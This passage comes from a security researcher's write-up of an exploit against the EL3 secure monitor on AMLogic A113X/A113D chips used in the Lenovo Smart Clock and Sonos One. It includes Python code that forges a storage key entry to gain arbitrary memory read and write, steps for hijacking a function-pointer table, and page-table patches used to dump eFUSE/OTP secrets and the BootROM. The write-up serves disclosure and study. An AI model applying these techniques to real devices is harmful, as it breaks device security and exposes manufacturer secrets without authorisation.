    uint8_t *p = (param_sector_buf + 8);

    remaining = tlv_root->size;
    result = 0xFFFFFFFF;

    if ( tlv_root->type == 1 ) {
        while (remaining) {
            tlv_t *tlv_next = (tlv_t*)p;
            remaining -= (tlv_next->size + 8);
            if (tlv_next->type == 2) {
                out->encrypted_size = *(uint32_t*)(p + 8);
            } else if (tlv_next->type == 11 ) {
                out->type_11_val = *(uint32_t*)(p + 8);
            }
            p += (tlv_next->size + 8);
        }
        return 0;
    }
    return result;
}
```
As we can see, it parses a nested TLV structure that needs to start with a TLV of type `0x1` (the `TYPE_PARAM_HEADER` from earlier). If it does not... it will return an error code. Simple!
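Porting the routine to Python makes it easy to check a crafted block offline before encrypting it. This is a sketch mirroring the decompiled C above, returning `-1` where the C returns `0xFFFFFFFF`; a malformed block raises `struct.error` here once parsing runs past the buffer, where the original would keep walking memory.

```python
import struct


def parse_param_sector(buf):
    """Python port of the decompiled parse_param_sector; returns (rc, out)."""
    out = {}
    root_type, remaining = struct.unpack_from("<II", buf, 0)
    if root_type != 1:
        return -1, out                      # the failure path we want to hit
    p = 8
    while remaining:
        t, size = struct.unpack_from("<II", buf, p)
        remaining -= size + 8
        if t == 2:
            out["encrypted_size"] = struct.unpack_from("<I", buf, p + 8)[0]
        elif t == 11:
            out["type_11_val"] = struct.unpack_from("<I", buf, p + 8)[0]
        p += size + 8
    return 0, out
```

Any `0x200`-byte block whose first 32-bit word is not 1 (for example all zeroes) takes the failure path.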
The first key index that (partially) overlaps with `param_sector_decrypted` is 64, but its initial 8 bytes are occupied by the value of `g_key_version`, which is overwritten when we trigger storage parsing the second time. While still usable, for convenience’s sake let’s put the forged `key_entry` we care about into the next slot (index 65), since it fully overlaps with controlled data from `param_sector_decrypted`.
Our forged `key_entry` will look like this:
Offset | Field | Value |
---|---|---|
0x00 | name | “XXXX” |
0x50 | name_len | 4 |
0x54 | buffer_status | 0 |
0x58 | key_type | 0 |
0x5c | value_size | 8 |
0x60 | value_ptr | ANY_POINTER_WE_LIKE |
0x68 | hash | 0x00 * 32 |
0x88 | key_in_use | 1 |
0x8c | unknown | 0 |
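Putting the table into bytes: the sketch below packs this entry with a `struct` format that reproduces the `0x90`-byte layout and places it at offset `0x88` of a `0x200`-byte param block (slot 65: `0x4 + 65 * 0x90 - 0x240c = 0x88`). The first word stays 0, so `parse_param_sector` fails as required. The helper names are hypothetical, and the block still has to be encrypted with the key/IV chosen by `seed_mode` before it goes into the storage blob.

```python
import struct

KEY_ENTRY_FMT = "<80sIIIIQ32sII"  # name .. unknown, 0x90 bytes, no padding
PARAM_SECTOR_SIZE = 0x200
FORGED_OFFSET = 0x88              # g_keys[65] inside param_sector_decrypted


def forged_key_entry(value_ptr, name=b"XXXX", value_size=8):
    """Pack a key_entry with the field values from the table above."""
    return struct.pack(KEY_ENTRY_FMT, name, len(name), 0, 0, value_size,
                       value_ptr, bytes(32), 1, 0)


def forged_param_sector(value_ptr):
    """Param block that fails parsing (type != 1) but carries the forged entry."""
    sector = bytearray(PARAM_SECTOR_SIZE)  # first TLV type stays 0
    entry = forged_key_entry(value_ptr)
    sector[FORGED_OFFSET:FORGED_OFFSET + len(entry)] = entry
    return bytes(sector)
```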
Now, if we trigger a `SIP_CMD_STORAGE_READ` operation requesting to read the value of the storage item with name `XXXX`, it will traverse the `g_keys` array until it reaches our forged `key_entry` object and will copy `key_entry.value_size` (8) bytes from `key_entry.value_ptr` to the output buffer in shared memory, from where we can retrieve it. This gives us an arbitrary `read64` primitive!
We can use exactly the same approach, but with `SIP_CMD_STORAGE_WRITE` instead, to get an arbitrary `write64` primitive.
Using our `write64` primitive we can finally overwrite the pointer to `platform_ops` to hijack the function pointer table of the SiP SMC dispatcher.
[+] Dumping the eFUSE/OTP data
So we have some control flow hijacking in the secure monitor. What’s next? Let’s try to dump the eFUSE/OTP data somehow.
Let us start by slightly upgrading our set of primitives. The SiP SMC dispatcher will invoke the correct function pointer from the `platform_ops` table depending on the SMC ID, and call this function with the right number of arguments that were originally passed to the SMC. I noticed that for SMC `0x820000FF` the dispatcher passes the original SMC arguments (X1, X2, X3, X4) into the handler as-is (X0, X1, X2, X3).
So hijacking this entry in the `platform_ops` table while leaving the rest untouched gives us an arbitrary `call4` (function call with up to 4 controlled arguments) primitive when invoking SMC `0x820000FF`.
During reversing I had already identified the EL3 code that reads data from the OTP. This works by sending an SCPI message (command `0x8000C2`, to be precise) to the SCP (System Control Processor) using a mailbox MMIO interface. We don’t have to reimplement this, of course; we just `call4` the convenience function that does this for us.
The prototype for this function is:
```c
int aml_scpi_cmd_efuse_read(void *out, uint32_t offset, uint32_t size);
```
So, in order to dump the eFUSE/OTP data using our EL3 SMC exploit, we can just:
```
call4(aml_scpi_cmd_efuse_read, SOME_DRAM_ADDRESS, 0, 0x100)
```
And afterwards we just read it back from DRAM in the “normal world”. :-)
[+] Dumping the BootROM
We’re almost done, but a copy of the application processor’s BootROM would be nice to have now that we’re able to run code in this privileged context. From the (leaked) A113X datasheet we can learn that the physical address of the BootROM is `0xffff0000`.
However, we can’t simply read it from EL3, because BL31 configured the MMU and there is no VA mapping for PA `0xffff0000` we can read from. Let’s learn a bit about the MMU setup and the page tables.
The intricate details of the AArch64 memory model are quite involved; we’re only going to try and understand the bare minimum needed to patch up the existing configuration/page tables so we can dump the ROM. ;-)
In EL3 the level 1 page table address is configured by writing to the special register `TTBR0_EL3` (the Translation Table Base Register 0 for EL3) using the `MSR` instruction. Another important special register is `TCR_EL3` (the Translation Control Register for EL3), which configures things like the page granule and the size of the address space.
If we follow the ATF code (and BL31 disassembly) we will find the routine `enable_mmu_el3`, which contains the following writes to these special registers:
```
TCR_EL3   = 0x80803520
TTBR0_EL3 = base_xlation_table
```
`0x80803520` corresponds to the following settings for `TCR_EL3` (bits 23 and 31 are set because they are RES1):
Bits | Field | Value |
---|---|---|
0:5 | T0SZ | 0x20 |
8:9 | IRGN0 | 1 |
10:11 | ORGN0 | 1 |
12:13 | SH0 | 3 |
14:15 | TG0 | 0 = 4KiB page granule |
16:18 | PS | 0 |
20 | TBI | 0 = Top Byte used in the address calculation |
The width of the address space in bits is `64 - T0SZ`, so in this case we have a 32-bit address space. With a 4KiB granule and a 32-bit address space there is no level 0 page table; we start at level 1. The level 1 page table is indexed with bits 30 up to (and including) bit 38. For a 32-bit address this means it will only be indexed with bits 30 and 31, giving us a level 1 page table of exactly 4 entries. Each entry spans 1GiB (0x40000000).
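Decoding the register value mechanically is a good sanity check. The field positions below follow the Armv8-A `TCR_EL3` definition; `decode` and `l1_entries` are hypothetical helpers, and `l1_entries` only covers VA sizes whose lookup starts at level 1 with a 4KiB granule.

```python
TCR_EL3 = 0x80803520

# (name, low bit, width); bits 23 and 31 are RES1 and not decoded here
TCR_FIELDS = [
    ("T0SZ", 0, 6),
    ("IRGN0", 8, 2),
    ("ORGN0", 10, 2),
    ("SH0", 12, 2),
    ("TG0", 14, 2),
    ("PS", 16, 3),
    ("TBI", 20, 1),
]


def decode(value, fields):
    return {name: (value >> lo) & ((1 << width) - 1) for name, lo, width in fields}


def l1_entries(t0sz):
    """Level 1 entries for a 4KiB granule when the walk starts at level 1."""
    va_bits = 64 - t0sz
    assert 30 < va_bits <= 39, "walk would not start at level 1"
    return 1 << (va_bits - 30)  # level 1 indexes VA[38:30], 1GiB per entry


if __name__ == "__main__":
    f = decode(TCR_EL3, TCR_FIELDS)
    print(f, "VA bits:", 64 - f["T0SZ"], "L1 entries:", l1_entries(f["T0SZ"]))
```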
If we dump the level 1 page table by reading 32 bytes from the address written to `TTBR0_EL3`, we see:
```
0x00000000051c6003
0x0000000000000000
0x0000000000000000
0x00000000051c9003
```
The lower 2 bits of each entry describe the type of descriptor. Any entry which does not have bit 0 set is considered invalid. The first and last entries have a value of 0x3 for the lower 2 bits, which means they are table descriptors pointing to the next level’s table.
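Address `0xffff0000` falls in the last 1GiB region (level 1 index 3), so we follow the last entry (`0x51c9003`) to the level 2 table at `0x51c9000`. Level 2 page tables are indexed using bits 21:29 (9 bits) of the virtual address. Since we’re interested in the address `0xffff0000`, we can calculate the index into the table by taking bits 21:29, which gives 0x1ff. Every entry in the level 2 table spans a region of 2MiB, so entry 0x1ff covers `ffe00000-ffffffff`.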
At `0x51c9000 + (0x1ff * 8)` we find the value `0x51cd003`, another table descriptor pointing to the level 3 page table at `0x51cd000`. At level 3 no more indirection is allowed: every 64-bit value in a level 3 table describes the mapping of a single 4KiB page.
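The index arithmetic for the whole walk fits in a few lines. This sketch (hypothetical helpers) computes the level 1/2/3 indices for a 4KiB granule and extracts the next-level table address (bits 47:12) from a table descriptor; it reproduces the numbers used in this section.

```python
VA = 0xFFFF0000


def indices(va):
    """Level 1/2/3 indices for a 4KiB granule: VA[38:30], VA[29:21], VA[20:12]."""
    return (va >> 30) & 0x1FF, (va >> 21) & 0x1FF, (va >> 12) & 0x1FF


def table_address(desc):
    """Next-level table address from a level 1/2 table descriptor."""
    assert desc & 0x3 == 0x3, "not a table descriptor"
    return desc & 0x0000FFFFFFFFF000


if __name__ == "__main__":
    l1, l2, l3 = indices(VA)
    print("L1 %d, L2 0x%x, L3 0x%x" % (l1, l2, l3))
    print("L2 entry at 0x%x" % (table_address(0x51C9003) + l2 * 8))
```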
A level3 descriptor value is structured like this:
Bits | Field | notes |
---|---|---|
52:63 | UPAT | Upper Page Attributes |
40:51 | RES0 | Should be zeroed |
12:39 | ADDR | Address bits 12-39 |
2:11 | LPAT | Lower Page Attributes |
0:1 | TYPE | always 0x3 (0b11) for a valid page descriptor |
The upper page attributes consist of 3 single-bit properties (ignoring any reserved bits): the `contiguous hint` bit (52), the `PXN` bit (53) and the `XN` bit (54).
We don’t really care about enforcing `XN` (eXecute Never) or `PXN` (Privileged eXecute Never), and we don’t have to set the `contiguous hint` bit either for the page table entries we’re about to introduce, so our `UPAT` value is zero.
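The lower page attributes (10 bits) are a bit more involved and are structured like this (bit positions relative to `LPAT`, with the descriptor bit in parentheses):
Bits | Field |
---|---|
0:2 (2:4) | attrindex |
3 (5) | ns |
4:5 (6:7) | ap |
6:7 (8:9) | sh |
8 (10) | af |
9 (11) | nG |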
The 3-bit `attrindex` field selects which of the eight attribute fields in `MAIR_EL3` (the Memory Attribute Indirection Register) applies to the page. `enable_mmu_el3` sets up the attribute we want at index 1, so we use an `attrindex` value of `0b001`.
The `ns` bit is the Non-Secure bit; since we’ll be dumping the ROM using our privileged `read64` primitive, we can simply leave this set to 0.
The two-bit `ap` field maps to the page access permissions as per the AP[2:1] access permission model. Again, since we’re only going to access this region with our privileged `read64` primitive, it is safe to set these bits to 0, making the entry R/W for our privilege level.
The `sh` field is used to specify the “shareability” attributes of this page. We’ll specify a value of `0b10` here (Outer Shareable), so any processor, core and peripheral can access it (although that isn’t strictly necessary, of course).
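The `af` (Access Flag) bit we’ll set to 1 for reasons I never bothered to fully comprehend (in short: accessing a page whose AF bit is clear raises an Access Flag fault unless hardware management of the flag is enabled). Finally, the `nG` (not-Global) bit indicates whether an entry is global or not; we’ll leave this bit cleared to mark it as global.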
We end up with an `LPAT` value of `0x181`.
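The same value falls out of composing the fields explicitly. The bit positions are those of the Armv8-A stage 1 page descriptor lower attributes (descriptor bits 11:2), shifted down so that `attrindex` starts at bit 0; `lpat` is a hypothetical helper.

```python
def lpat(attrindex, ns, ap, sh, af, ng):
    """Lower page attributes (descriptor bits 11:2), shifted down to bit 0."""
    return ((attrindex & 0x7)
            | (ns & 1) << 3
            | (ap & 0x3) << 4
            | (sh & 0x3) << 6
            | (af & 1) << 8
            | (ng & 1) << 9)


if __name__ == "__main__":
    value = lpat(attrindex=0b001, ns=0, ap=0b00, sh=0b10, af=1, ng=0)
    print(hex(value))
    # full level 3 descriptor for the first BootROM page
    print(hex((0xFFFF0000 & 0xFFFFF000) | (value << 2) | 3))
```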
Putting it all together, we can construct our page table entries by doing:
```
(addr & 0xfffff000) | (0x181 << 2) | 3
```
We don’t know (yet) exactly how big the BootROM is, but we can start by mapping 64KiB worth of pages starting at `0xffff0000` and see how far that gets us. To calculate the index into the L3 page table we’re patching we can simply do `(addr - 0xffe00000) / 0x1000`, and of course multiply this index by 8 to get the byte offset (remember, every page table entry is 64 bits).
Let’s summarize in a simple-to-follow Python snippet:
```python
#!/usr/bin/env python
LPAT = 0x181
UPAT = 0
tbl_start = 0xffe00000  # first VA covered by the L3 table we patch
map_start = 0xffff0000  # BootROM physical base
map_end = map_start + (1024 * 64)

for addr in range(map_start, map_end, 0x1000):
    index = (addr - tbl_start) // 0x1000
    entry = (addr & 0xfffff000) | (UPAT << 52) | (LPAT << 2) | 3
    print("write64(L3_TABLE + 0x%04x, 0x%016x)" % (index * 8, entry))
```
This will give us the list of 64-bit writes needed to map (1:1, identity-mapped, VA=PA) the BootROM region. Afterwards, we simply use our `read64` primitive to dump the entire 64KiB region to a file. Of course we could easily have upgraded the `read64` primitive to something that reads data faster; as it is, it takes a minute or so to dump the full 64KiB... but who would mind a little suspense after all this work? ;-)
After examining the resulting data we quickly notice some repeating strings and can conclude that the image loops after `0x8000` bytes. So the actual size of the ROM is 32KiB.
```
$ sha256sum a113x_bootrom.bin
7d1f63f6ddec05f538243aaa532c0503517de8ce9d2033d2b36b6c79695be626 a113x_bootrom.bin
```
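Spotting the repetition by eye works fine, but the check is easy to automate. This hypothetical helper looks for the smallest power-of-two size at which the dump repeats itself, which is how a mirrored ROM shows up in an oversized mapping.

```python
def smallest_period(data, min_size=0x1000):
    """Smallest power-of-two size at which data repeats (mirrored ROM)."""
    size = min_size
    while size < len(data):
        if all(data[i:i + size] == data[:size] for i in range(size, len(data), size)):
            return size
        size *= 2
    return len(data)
```

For the 64KiB dump described above it would report `0x8000`, and the first `0x8000` bytes are then the actual ROM image.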
[+] Closing Words & What’s next?
You made it this far!
I started writing this post back in December... but documenting stuff for the public is always much less exciting than working on new stuff, bla bla bla.
Anyway, I hope you enjoyed the read! Feel free to reach out to point out any inconsistencies. The EL3 exploit described in this post applies to both the Lenovo Smart Clock (AMLogic A113X SoC) and the Sonos One gen2 (AMLogic A113D SoC). The exploit was initially prototyped on the Lenovo clock from a U-boot context and was later ported to the Sonos One, running from a Linux userland context (assisted by a custom kernel module). All of this code can be found on Github.
It would be great if some exploit could be found in the A113X/D BootROM. I did some cursory RE work to quickly check whether the amlogic-usbdl bug is also present in the A113X BootROM, but it looks like that is not the case (feel free to double check, of course :-)).
Even if such a bug were present, it would be useless for permanently jailbreaking the Sonos One gen2, since they blow the eFUSE that disables the USB recovery functionality in the BootROM altogether. :-(
There will be a follow up post describing some Sonos specific stuff like their flash encryption and OTA update encryption, stay tuned!